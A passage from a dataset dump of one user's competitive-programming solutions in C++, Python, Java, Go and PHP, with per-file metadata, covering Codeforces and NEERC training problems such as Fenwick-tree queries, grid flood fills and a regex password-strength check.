\"\\t\");\n forj(k)\n a[i].pb(temp[q[j]]);\n\n //cout << a[i].size() << endl;\n //forj(a[i].size())\n //cout << a[i][j] << endl;\n }\n int ans = 0;\n fori(n)\n for (int j = i + 1; j < n; ++j)\n ans += get(a[i], a[j]);\n cout << ans;\n return 0;\n}\n" }, { "alpha_fraction": 0.4804932177066803, "alphanum_fraction": 0.5041439533233643, "avg_line_length": 24.632123947143555, "blob_id": "9a04f62911c5121c35ce5c4d0d920af203ef2202", "content_id": "b42e2f22347c1b91c843aa4935b49bb7285e6902", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4947, "license_type": "no_license", "max_line_length": 174, "num_lines": 193, "path": "/CodeForce/1746/F.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... 
args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\nstatic const int TREES = 40;\nstatic const int N = 3 * 100000 + 10;\nstatic const int Q = 3 * 100000 + 10;\n\n//Igorjan\n//rng\nmt19937 rng(chrono::steady_clock::now().time_since_epoch().count());\n\n//fenwickTree\n//1-indexed, [l, r]\ntemplate <typename T>\nstruct fenwickTree\n{\n int t[N];\n int n;\n\n fenwickTree()\n {\n n = N;\n fori(n) t[i] = 0;\n }\n\n fenwickTree(vector<T>& arr)\n {\n n = arr.size();\n fori(n)\n update(i + 1, arr[i]);\n }\n\n inline void update(int index, T value)\n {\n for (; index <= n; index += index & -index)\n t[index] += value;\n }\n\n inline T sum(int i)\n {\n T res = 0;\n for (; i; i -= i & -i)\n res += t[i];\n return res;\n }\n\n inline T sum(int l, int r)\n {\n return sum(r) - sum(l - 1);\n }\n\n T sum0(int l, int r)\n {\n return sum(r + 1) - sum(l);\n }\n};\n\n//}}}\n\nfenwickTree<int> trees[TREES];\nbitset<N + Q> used[TREES];\n\nstruct query {\n int type;\n int l, r, k;\n query() {}\n};\n\nistream& operator>>(istream& is, query& q) {\n is >> q.type;\n if (q.type == 1)\n is >> q.l >> q.k;\n else\n is >> q.l >> q.r >> q.k;\n return is;\n}\nvector<query> queries;\n\nvoid run()\n{\n ints(n, q);\n vi a(n);\n vector<query> queries(q);\n readln(a, queries);\n vector<array<int, 3>> coords;\n fori(n)\n coords.pb({a[i], 1, i});\n fori(q)\n if (queries[i].type == 1)\n coords.pb({queries[i].k, 0, i});\n sort(all(coords));\n\n int counter = 0;\n for (int i = 0; i < SZ(coords); )\n {\n int j = i;\n while (j < SZ(coords) && coords[j][0] == coords[i][0])\n ++j;\n FOR(k, i, j)\n if (coords[k][1] == 0)\n queries[coords[k][2]].k = counter;\n else\n a[coords[k][2]] = counter;\n\n ++counter;\n i = j;\n }\n\n fori(TREES)\n forj(N + Q)\n used[i][j] = (rng() & 1) != 0;\n\n fori(TREES)\n forj(n)\n if (used[i][a[j]])\n trees[i].update(j + 1, 1);\n\n for (auto& [t, l, r, k]: queries)\n {\n if (t == 2)\n {\n bool ok = (r - l + 1) 
% k == 0;\n for (int i = 0; i < TREES && ok; ++i)\n ok &= trees[i].sum(l, r) % k == 0;\n writeln(ok ? \"YES\" : \"NO\");\n }\n else\n {\n fori(TREES)\n {\n if (used[i][a[l - 1]])\n trees[i].update(l, -1);\n if (used[i][k])\n trees[i].update(l, 1);\n }\n a[l - 1] = k;\n }\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n cin.tie(0);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.5088131427764893, "alphanum_fraction": 0.6509988307952881, "avg_line_length": 36, "blob_id": "ecb991771a5159c6977c9c2748dd85eb35e6db9e", "content_id": "883d6d75defce44a6185a9610a6760c145dc68fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1702, "license_type": "no_license", "max_line_length": 66, "num_lines": 46, "path": "/CodeForce/1769/D2.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "k = int(input())\nif k == 13:\n print('''6C TC JC QC 6D 8D 9D TD JD QD KD 7S 8S TS JS KS AS TH\n7C 8C 9C KC AC 7D AD 6S 9S QS 6H 7H 8H 9H JH QH KH AH\n\n6C 8C AC 6D 8D TD JD KD 6S 8S 9S TS JS QS 8H JH KH AH\n7C 9C TC JC QC KC 7D 9D 
QD AD 7S KS AS 6H 7H 9H TH QH\n\n6C 8C 9C QC KC AC 6D 7D JD AD 8S JS 6H 7H 8H 9H QH AH\n7C TC JC 8D 9D TD QD KD 6S 7S 9S TS QS KS AS TH JH KH\n\n8C TC QC AC 6D 7D TD QD KD 6S 7S JS QS KS 7H 9H TH JH\n6C 7C 9C JC KC 8D 9D JD AD 8S 9S TS AS 6H 8H QH KH AH\n\n6C 9C KC 6D 7D TD JD KD AD TS JS QS AS 9H TH JH QH AH\n7C 8C TC JC QC AC 8D 9D QD 6S 7S 8S 9S KS 6H 7H 8H KH\n\n7C 9C TC QC KC 8D AD 6S 7S 8S 9S JS AS 6H 7H 8H JH KH\n6C 8C JC AC 6D 7D 9D TD JD QD KD TS QS KS 9H TH QH AH\n\nTC JC QC AC 7D 8D AD 7S TS JS QS KS 7H 9H TH JH QH AH\n6C 7C 8C 9C KC 6D 9D TD JD QD KD 6S 8S 9S AS 6H 8H KH\n\n9C QC KC 6D 7D JD QD 6S 7S 8S JS AS 6H 7H 9H TH KH AH\n6C 7C 8C TC JC AC 8D 9D TD KD AD 9S TS QS KS 8H JH QH\n\n6C 6D 7D 8D 9D TD JD QD AD 6S 7S 8S TS QS 7H 8H JH QH\n7C 8C 9C TC JC QC KC AC KD 9S JS KS AS 6H 9H TH KH AH\n\n6C 8C JC QC KC AC 8D 9D 7S TS JS QS AS 7H 8H TH QH AH\n7C 9C TC 6D 7D TD JD QD KD AD 6S 8S 9S KS 6H 9H JH KH\n\n8C 9C 6D 9D KD 6S 7S 8S TS JS QS KS AS 7H 8H 9H KH AH\n6C 7C TC JC QC KC AC 7D 8D TD JD QD AD 9S 6H TH JH QH\n\n7C 8C 9C KC AC 6D 7D 9D JD 6S 8S TS QS KS AS 7H 9H QH\n6C TC JC QC 8D TD QD KD AD 7S 9S JS 6H 8H TH JH KH AH\n\n6C 8C JC KC AC 9D 9S TS QS KS AS 6H 7H 8H JH QH KH AH\n7C 9C TC QC 6D 7D 8D TD JD QD KD AD 6S 7S 8S JS 9H TH''')\nelse:\n print('''KS QD 8D QC 8S 8C JD 9H AC TH 9S 9D QH 7H 8H TS 7S 9C\n6D JS 7D KH QS TC AD AS KC 6C 7C TD AH KD 6S JC JH 6H\n\nJC JS 8S TD JD KH 7D 9C KC TH QD 8D 7H TC KD 9H 8C 6D\n7S AC QH AD 8H TS 6H JH 6C AH 7C 6S 9D QC AS QS KS 9S''')\n" }, { "alpha_fraction": 0.4587385356426239, "alphanum_fraction": 0.47179773449897766, "avg_line_length": 26.162263870239258, "blob_id": "7772da78568843cecc4382c038c27ae3545be12c", "content_id": "1b1a7450ddefdbae0ca5041b1572af58a0d00bc8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 7198, "license_type": "no_license", "max_line_length": 165, "num_lines": 265, "path": "/trains/neerc/neerc.ifmo.ru.train.2016.09.28/E.cpp", 
"repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 19 March 2015 (deleted unused defines & reorganization from 05 November 2015)\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); ++it)\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn1(i, n) for (int i = 1; i < (int) (n); ++i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n \n#define ll long long\n#define pb push_back\n#define vi vector<int>\n#define pii pair<int, int>\n#define vll vector<long long>\n#define pll pair<long long, long long>\n#define whole(a) a.begin(), a.end()\n#define next next__\n#define prev prev__\n#define count count__\n#define argmax(a) (max_element(whole(a)) - (a).begin())\n#define argmin(a) (min_element(whole(a)) - (a).begin())\n \n#define ints(a...) int a; readln(a)\n#define lls(a...) ll a; readln(a)\n#define wr(args...) err(split(#args,',').begin(),args)\n \n#define FILENAME \"input\"\n#define INF 1000000007\n \n#define tthti template<typename Head, typename... Tail> inline\n#define ttt12i template<typename T1, typename T2> inline\n#define ttti template<typename T> inline\n \ninline void writeln2(){cout<<\"\\n\";}\ninline void writeln() {cout<<\"\\n\";}\ninline void readln() {}\nttti void read(T&);\nttti void priws(T);\nttti void print(T);\n \nvoid err(vector<string>::iterator it){++it;}\ntthti void readln (Head& head,Tail&... tail){read(head); readln (tail...);}\ntthti void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntthti void writeln (Head head, Tail... 
tail){priws(head);writeln2(tail...);}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\nvector<string>split(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.pb(x);return v;}\n \n///-------------------------------------------------------------------------------------------------------------------------------------\n//Igorjan\nstring colors = \"BGRWY\";\nint n, m;\nint cccc = 0;\nvector<vector<int>> sizes;\n \nstruct lol\n{\n int mc = -1, mx = 100, my = -1;\n char color;\n lol(){}\n \n const bool operator<(const lol& b) const {\n if (mc != b.mc)\n return mc > b.mc;\n if (my != b.my)\n return my > b.my;\n return mx < b.mx;\n }\n};\nvector<lol> sss;\n \nvoid dfs(vector<string>& f, int i, int j, lol& temp)\n{\n if (i < 0 || j < 0 || i == n || j == m || sizes[i][j] || f[i][j] != temp.color)\n return;\n sizes[i][j] = ++cccc;\n temp.mc = max(temp.mc, cccc);\n temp.mx = min(temp.mx, j);\n temp.my = max(temp.my, i);\n dfs(f, i + 1, j, temp);\n dfs(f, i - 1, j, temp);\n dfs(f, i, j + 1, temp);\n dfs(f, i, j - 1, temp);\n}\n \nvoid kill(vector<string>& f, int i, int j, char color)\n{\n if (i < 0 || j < 0 || i == n || j == m || f[i][j] != color || f[i][j] == 'P')\n return;\n f[i][j] = 'P';\n kill(f, i + 1, j, color);\n kill(f, i - 1, j, color);\n kill(f, i, j + 1, color);\n kill(f, i, j - 1, color);\n}\n \nlol hasColorToKill(vector<string>& f, char color)\n{\n sss.clear();\n fori(n)\n forj(m)\n sizes[i][j] = 0;\n lol notColor, isColor;\n fori(n)\n forj(m)\n if (sizes[i][j] == 0 && f[i][j] != 'P')\n {\n lol temp;\n temp.color = f[i][j];\n cccc = 0;\n dfs(f, i, j, temp);\n if (temp.mc > 1)\n if (color == f[i][j])\n isColor = min(isColor, temp);\n else\n notColor = min(notColor, temp);\n }\n if (notColor.mc != -1)\n return notColor;\n return isColor;\n}\n \nvoid 
toDown(vector<string>& f)\n{\n int col = -1;\n forj(m)\n {\n int last = -1;\n bool ok = true;\n for (int i = n - 1; i >= 0; --i)\n {\n ok &= f[i][j] == 'P';\n if (f[i][j] == 'P' && last == -1)\n last = i;\n if (f[i][j] != 'P' && last != -1)\n swap(f[i][j], f[last--][j]);\n }\n \n if (ok && col == -1)\n col = j;\n if (!ok && col != -1)\n {\n fori(n)\n swap(f[i][col], f[i][j]);\n col++;\n }\n }\n}\n \nvoid toLeft(vector<string>& f)\n{\n return;\n forn(q, n)\n forj(m)\n {\n int cc = 0;\n fori(n)\n cc += f[i][j] == 'P';\n if (cc == n && j + 1 < m)\n fori(n)\n swap(f[i][j], f[i][j + 1]);\n }\n}\n \nll proceed(vector<string> f, char color)\n{\n ll ans = 0;\n while (true)\n {\n lol temp = hasColorToKill(f, color);\n if (temp.mc == -1)\n return ans;\n ans += temp.mc * (temp.mc - 1);\n kill(f, temp.my, temp.mx, temp.color);\n// writeln(\"ans +=\", temp.mc, ans);\n //writeln(\"after kill\");\n //writeln(f);\n //cout.flush();\n //int qwerqwerwqer;\n // readln(qwerqwerwqer);\n toDown(f);\n toLeft(f);\n// writeln(\"after down and left\");\n //writeln(f);\n //cout.flush();\n// readln(qwerqwerwqer);\n }\n return ans;\n}\n \nvoid run()\n{\n readln(n, m);\n vector<string> s(n);\n readln(s);\n sizes.resize(n, vector<int>(m));\n \n for (char mainColor : colors)\n {\n fori(n)\n forj(m)\n if (s[i][j] == mainColor)\n {\n printf(\"%c: %lld\\n\", mainColor, proceed(s, mainColor));\n goto skip;\n }\n skip:\n 42;\n }\n}\n \n \nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n ios_base::sync_with_stdio(false);\n freopen(\"input.txt\", \"r\", stdin);\n freopen(\"output.txt\", \"w\", stdout);\n run();\n#ifndef ONLINE_JUDGE\n //writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i 
ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){if(a.size()==0){int n;is>>n;a.resize(n);}for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;}\n" }, { "alpha_fraction": 0.311970978975296, "alphanum_fraction": 0.3409915268421173, "avg_line_length": 18.690475463867188, "blob_id": "9dc7daf1288ccb8b0f05075de1911861171813d4", "content_id": "e97133b1b5a01bf71d002a501ee006f3ef434ee9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 827, "license_type": "no_license", "max_line_length": 67, "num_lines": 42, "path": "/CodeForce/0378/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <vector>\n\nusing namespace std;\n\nvector<vector<int>> b;\nint n, m, k, s1, s2;\n\nvoid bfs(int i, int j)\n{\n if (b[i][j] || !k)\n return;\n k--;\n b[i][j] = 2;\n bfs(i + 1, j);\n bfs(i - 1, j);\n bfs(i, j + 1);\n bfs(i, j - 1);\n}\n\nint main()\n{\n scanf(\"%d %d %d\\n\", &n, &m, &k);\n k = -k;\n b.resize(n + 2);\n for (int i = 0; i <= n + 1; i++)\n b[i].resize(m + 2, 1);\n for (int i = 1; i <= n; i++)\n for (int j = 1; j <= m + 1; j++)\n if (!(b[i][j] = (int)(getchar() != '.')))\n k++,\n s1 = i,\n s2 = j;\n bfs(s1, s2);\n for (int i = 1; i <= n; i++)\n {\n for (int j = 1; j <= m; j++)\n putchar(b[i][j] == 0 ? 'X' : b[i][j] == 1 ? 
'#' : '.');\n printf(\"\\n\");\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.6136363744735718, "alphanum_fraction": 0.6818181872367859, "avg_line_length": 43, "blob_id": "a3b8ea1aa317eddc7f30a9c0ff0f9e99838f5b8c", "content_id": "b4f794f6952d8a739fe4d54126e0faaeebb59f1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 44, "license_type": "no_license", "max_line_length": 43, "num_lines": 1, "path": "/CodeForce/0493/D.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "print(\"black\"if input()&1 else\"white\\n1 2\")\n" }, { "alpha_fraction": 0.4661538600921631, "alphanum_fraction": 0.48769229650497437, "avg_line_length": 26.08333396911621, "blob_id": "a1e034be3ffe0d25608744b3c388ab5a57bd0796", "content_id": "c37b3060bc0f6e33d72498427efeb1753031762d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 650, "license_type": "no_license", "max_line_length": 54, "num_lines": 24, "path": "/CodeForce/0411/allLanguages/go.go", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "package main\nimport (\n \"os\"\n \"bufio\"\n\"regexp\"\n)\n \nfunc main() {\n in := bufio.NewReader(os.Stdin)\n line, _ := in.ReadString('\\n')\n if (line[len(line)-1] == '\\n') {\n line = line[0 : len(line)-2]\n }\n match, _ := regexp.MatchString(\".{5,}\", line)\n match1, _ := regexp.MatchString(\"[0-9]\", line)\n match2, _ := regexp.MatchString(\"[a-z]\", line)\n match3, _ := regexp.MatchString(\"[A-Z]\", line)\n match4 := match && match2 && match3 && match1\n if (match4) {\n \t os.Stdout.WriteString(\"Correct\")\n } else {\n os.Stdout.WriteString(\"Too weak\") \n }\n}\n" }, { "alpha_fraction": 0.5461538434028625, "alphanum_fraction": 0.5589743852615356, "avg_line_length": 31.5, "blob_id": "ba47715cad819dfa1cd2028314d5682489f2800e", "content_id": "27a239563212581e97249e848d595525be7ff39e", "detected_licenses": [], "is_generated": false, "is_vendor": false, 
"language": "PHP", "length_bytes": 390, "license_type": "no_license", "max_line_length": 70, "num_lines": 12, "path": "/CodeForce/0411/allLanguages/php.php", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "<?php\n$line = trim(fgets(STDIN));\n$a = 0;\n$a = $a + preg_match('/.{5,}/', $line, $matches, PREG_OFFSET_CAPTURE);\n$a = $a + preg_match('/[a-z]/', $line, $matches, PREG_OFFSET_CAPTURE);\n$a = $a + preg_match('/[A-Z]/', $line, $matches, PREG_OFFSET_CAPTURE);\n$a = $a + preg_match('/[0-9]/', $line, $matches, PREG_OFFSET_CAPTURE);\nif ($a == 4)\n print 'Correct';\nelse\n print 'Too weak';\n?>\n" }, { "alpha_fraction": 0.5006693601608276, "alphanum_fraction": 0.5287817716598511, "avg_line_length": 15.090909004211426, "blob_id": "24c4f2c555785b3eb89ec98f7952d603f837ada7", "content_id": "d44b73f361438f3f81a1697db3be3bd69383cf5e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 747, "license_type": "no_license", "max_line_length": 44, "num_lines": 44, "path": "/trash/writelnTemplate.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <iostream>\r\n#include <vector>\r\n#include <cstdio>\r\n\r\nusing namespace std;\r\n\r\nvoid writeln_1()\r\n{\r\n printf(\"\\n\");\r\n return;\r\n}\r\n\r\ntemplate <class... Tail>\r\nvoid writeln_1(int head, Tail... tail)\r\n{\r\n printf(\" %d\", head);\r\n writeln_1(tail...);\r\n}\r\n\r\ntemplate <class... Tail>\r\nvoid writeln(int head, Tail... tail)\r\n{\r\n printf(\"%d\", head);\r\n writeln_1(tail...);\r\n}\r\n\r\nconstexpr int INF = 100;\r\n\r\nconstexpr int factorial (int n)\r\n{\r\n return n > 0 ? 
n * factorial(n - 1) : 1;\r\n}\r\nint main()\r\n{\r\n constexpr int x = factorial(11);\r\n writeln(x);\n vector<int> a;\n for (int i = 0; i < 12; i++)\n a.push_back(factorial(i));\n for (int s : a)\n writeln(s);\r\n writeln(1, 2, 3, 4, 5);\r\n return 0;\r\n}\r\n" }, { "alpha_fraction": 0.4598214328289032, "alphanum_fraction": 0.53125, "avg_line_length": 43.79999923706055, "blob_id": "76ab1aa31f699c364073f0d29c48d623a9e9f064", "content_id": "c8866bbf9f7b236c3e5391a886b7d81ea1884543", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 224, "license_type": "no_license", "max_line_length": 70, "num_lines": 5, "path": "/CodeForce/0501/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\n[a, b, t1, t2] = list(map(int, sys.stdin.readline().split()))\na = max(3 * a // 10, a - a // 250 * t1)\nb = max(3 * b // 10, b - b // 250 * t2)\nsys.stdout.write(\"Vasya\" if a < b else (\"Tie\" if a == b else \"Misha\"))\n" }, { "alpha_fraction": 0.3782542049884796, "alphanum_fraction": 0.38629403710365295, "avg_line_length": 23.29767417907715, "blob_id": "3325bb67d991761426f28cbd9b4f80ba72e76df5", "content_id": "a88a179242df6ffc01e4ee2d2dbcf469bd662db2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 5224, "license_type": "no_license", "max_line_length": 80, "num_lines": 215, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.09.23/D.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.BufferedReader;\nimport java.io.File;\nimport java.io.FileNotFoundException;\nimport java.io.FileReader;\nimport java.io.IOException;\nimport java.io.InputStreamReader;\nimport java.io.PrintWriter;\nimport java.math.BigInteger;\n\nimport java.util.ArrayList;\nimport java.util.HashMap;\nimport java.util.List;\nimport java.util.Map;\nimport java.util.Map.Entry;\nimport java.util.StringTokenizer;\n\npublic class D {\n FastScanner in;\n 
PrintWriter out;\n\n final String taskName = null;\n\n void mull(BigInteger[] a, int n) {\n\n while (n > 1) {\n int m = 0;\n\n for (int i = 1; i < n; i += 2) {\n a[m++] = a[i - 1].multiply(a[i]);\n }\n\n if (n % 2 == 1) {\n a[m++] = a[n - 1];\n }\n n = m;\n }\n }\n\n class Pair {\n int p, n;\n\n Pair(int p, int n) {\n this.p = p;\n this.n = n;\n }\n\n }\n\n List<Pair> fac(int n) {\n List<Pair> ans = new ArrayList<Pair>();\n\n if (n == 0) {\n ans.add(new Pair(0, 1));\n return ans;\n }\n\n if (n == 1) {\n return ans;\n }\n\n for (int d = 2; d * d <= n; d++) {\n int m = 0;\n while (n % d == 0) {\n ++m;\n n /= d;\n }\n if (m > 0) {\n ans.add(new Pair(d, m));\n }\n }\n\n if (n > 1) {\n ans.add(new Pair(n, 1));\n }\n return ans;\n }\n\n void mull(Map<Integer, Integer> map, List<Pair> n) {\n for (Pair pair : n) {\n Integer e = map.get(pair.p);\n if (e == null) {\n e = 0;\n }\n map.put(pair.p, e + pair.n);\n }\n }\n\n public void solve() {\n int n = in.nextInt();\n Map<Integer, Integer>[] a = new Map[n], b = new Map[n];\n\n for (int i = 0; i < n; i++) {\n a[i] = new HashMap<Integer, Integer>();\n b[i] = new HashMap<Integer, Integer>();\n\n int m = in.nextInt();\n List<Pair> p = fac(m - 1);\n List<Pair> q = fac(m - 0);\n\n mull(b[i], q);\n\n for (int j = 0; j < i; j++) {\n mull(a[j], p);\n mull(b[j], q);\n }\n }\n\n BigInteger[] p = new BigInteger[n * 1024], q = new BigInteger[n * 1024];\n\n for (int i = 0; i < n; i++) {\n if (a[i].containsKey(0)) {\n out.println(\"0/1\");\n } else {\n int ps = 1, qs = 1;\n p[0] = q[0] = BigInteger.ONE;\n\n for (Entry<Integer, Integer> entry : a[i].entrySet()) {\n Integer be = b[i].get(entry.getKey());\n if (be == null) {\n be = 0;\n }\n\n int ae = entry.getValue();\n\n int m = Math.min(ae, be);\n\n if (m != ae) {\n p[ps++] = BigInteger.valueOf(entry.getKey())\n .pow(ae - m);\n }\n\n if (m != be) {\n b[i].put(entry.getKey(), be - m);\n } else {\n b[i].remove(entry.getKey());\n }\n }\n\n for (Entry<Integer, Integer> entry : b[i].entrySet()) 
{\n q[qs++] = BigInteger.valueOf(entry.getKey()).pow(\n entry.getValue());\n }\n\n mull(p, ps);\n mull(q, qs);\n\n out.print(p[0]);\n out.print('/');\n out.print(q[0]);\n out.println();\n }\n }\n\n }\n\n public void run() {\n try {\n if (taskName == null) {\n in = new FastScanner(null);\n out = new PrintWriter(System.out);\n\n } else {\n in = new FastScanner(new File(taskName + \".in\"));\n out = new PrintWriter(new File(taskName + \".out\"));\n\n }\n\n solve();\n\n out.close();\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n\n class FastScanner {\n BufferedReader br;\n StringTokenizer st;\n\n FastScanner(File f) {\n try {\n if (f == null) {\n br = new BufferedReader(new InputStreamReader(System.in));\n } else {\n br = new BufferedReader(new FileReader(f));\n }\n } catch (FileNotFoundException e) {\n e.printStackTrace();\n }\n }\n\n long nextLong() {\n return Long.parseLong(next());\n }\n\n String next() {\n while (st == null || !st.hasMoreTokens()) {\n try {\n st = new StringTokenizer(br.readLine());\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n return st.nextToken();\n }\n\n int nextInt() {\n return Integer.parseInt(next());\n }\n }\n\n public static void main(String[] arg) {\n new D().run();\n }\n}\n" }, { "alpha_fraction": 0.5426127910614014, "alphanum_fraction": 0.5656148791313171, "avg_line_length": 32.90999984741211, "blob_id": "38a876f889d31ad60a04f6f925300480bc1becd0", "content_id": "5f335ba3c7729fd6353de76a3265bf64611736cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3391, "license_type": "no_license", "max_line_length": 174, "num_lines": 100, "path": "/CodeForce/1515/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. 
C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... 
args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nvoid run()\n{\n ints(n, l, r);\n vi a(n);\n readln(a);\n if (l > r)\n swap(l, r),\n reverse(all(a));\n //[LEFT || RIGHT ]\n //[c1, c2, c3, c4 || c5, c6, c7, c8, c9, ..., cn]\n //[1, 1 || 2, 2]\n map<int, int> left;\n map<int, int> right;\n fori(n)\n if (i < l)\n left[a[i]]++;\n else\n right[a[i]]++;\n int ans = 0;\n int oddLeft = 0;\n int oddRight = 0;\n int canLeft = 0;\n int canRight = 0;\n for (auto& [color, count]: right)\n {\n int eq = min(left[color], count);\n count -= eq;\n left[color] -= eq; //No action\n canRight += count / 2; //Change parity\n oddRight += count;\n }\n for (auto& [color, count]: left)\n {\n canLeft += count / 2; //Change parity\n oddLeft += count;\n }\n //odd == change color and parity\n int odd = min(oddLeft, oddRight);\n oddLeft -= odd;\n oddRight -= odd;\n oddLeft = clamp(oddLeft - canLeft, oddLeft / 2, oddLeft);\n oddRight = clamp(oddRight - canRight, 